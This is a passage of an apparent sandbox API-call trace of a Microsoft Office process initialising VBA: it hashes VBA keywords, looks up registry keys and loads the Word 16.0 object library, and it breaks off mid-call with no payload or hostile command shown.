() returned 0x2 [0030.426] CExposedStream::Release () returned 0x1 [0030.426] CExposedStream::Release () returned 0x0 [0030.426] IMalloc:Free (This=0x7fefe015380, pv=0xb4db430) [0030.426] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0030.427] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x6a80000 [0030.428] VirtualAlloc (lpAddress=0x9cb0000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9cb0000 [0030.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0030.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0030.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0030.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0030.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0030.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0030.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0030.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0030.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0030.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0030.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0030.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0030.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0030.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0030.434] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2e6690 | out: phkResult=0x2e6690*=0xa46) returned 0x0 [0030.434] RegOpenKeyW (in: hKey=0xa46, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x2e6688 | out: phkResult=0x2e6688*=0xa42) returned 0x0 [0030.434] RegEnumKeyW (in: hKey=0xa42, dwIndex=0x0, lpName=0x2e66b8, cchName=0xa | out: lpName="8.7") returned 0x0 [0030.435] wcscpy_s (in: _Destination=0x2e66a0, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0030.435] RegOpenKeyW (in: hKey=0xa42, lpSubKey="8.7", phkResult=0x2e6748 | out: phkResult=0x2e6748*=0xa52) returned 0x0 [0030.435] _ultoa_s (in: _Val=0x409, _DstBuf=0x2e66c0, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0030.435] RegOpenKeyA (in: hKey=0xa52, lpSubKey="409", phkResult=0x2e66b0 | out: phkResult=0x2e66b0*=0x0) returned 0x2 [0030.436] RegOpenKeyW (in: hKey=0xa56, lpSubKey="win64", phkResult=0x2e66b8 | out: phkResult=0x2e66b8*=0xa5e) returned 0x0 [0030.436] RegCloseKey (hKey=0xa5e) returned 0x0 [0030.436] RegCloseKey (hKey=0xa56) returned 0x0 [0030.436] _ultow_s (in: _Value=0x0, _Buffer=0x2e6750, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.436] RegOpenKeyW (in: hKey=0xa52, lpSubKey="0", phkResult=0x2e6728 | out: phkResult=0x2e6728*=0xa4e) returned 0x0 [0030.437] RegQueryValueW (in: hKey=0xa4e, lpSubKey="win64", lpData=0x2e6770, lpcbData=0x2e6724 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x2e6724) returned 0x0 [0030.437] wcscpy_s (in: _Destination=0x2e6aa0, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0030.437] RegCloseKey (hKey=0xa4e) returned 0x0 [0030.437] RegCloseKey (hKey=0xa52) returned 0x0 [0030.437] RegCloseKey (hKey=0xa42) returned 0x0 [0030.437] RegCloseKey (hKey=0xa46) returned 0x0 [0030.438] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x2e6728*=0x0 | out: pptlib=0x2e6728*=0x731da90) returned 0x0 [0030.438] ITypeLib:RemoteGetDocumentation (in: This=0x731da90, index=-1, refPtrFlags=0x2e6748, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x93bcd08 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x93bcd08*="따߾") returned 0x0 [0030.438] IUnknown:QueryInterface (in: This=0x731da90, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6538 | out: ppvObject=0x2e6538*=0x0) returned 0x80004002 [0030.438] ITypeLib:RemoteGetLibAttr (in: This=0x731da90, ppTLibAttr=0x2e6530, pDummy=0x10 | out: ppTLibAttr=0x2e6530, pDummy=0x10) returned 0x0 [0030.438] ITypeLib:RemoteGetDocumentation (in: This=0x731da90, index=-1, refPtrFlags=0x0, pBstrName=0x2e6528, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7742fc0 | out: pBstrName=0x2e6528*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7742fc0) returned 0x0 [0030.438] StringFromGUID2 (in: rguid=0x7667e30*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x2e6550, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0030.438] _ultow_s (in: _Value=0x8, 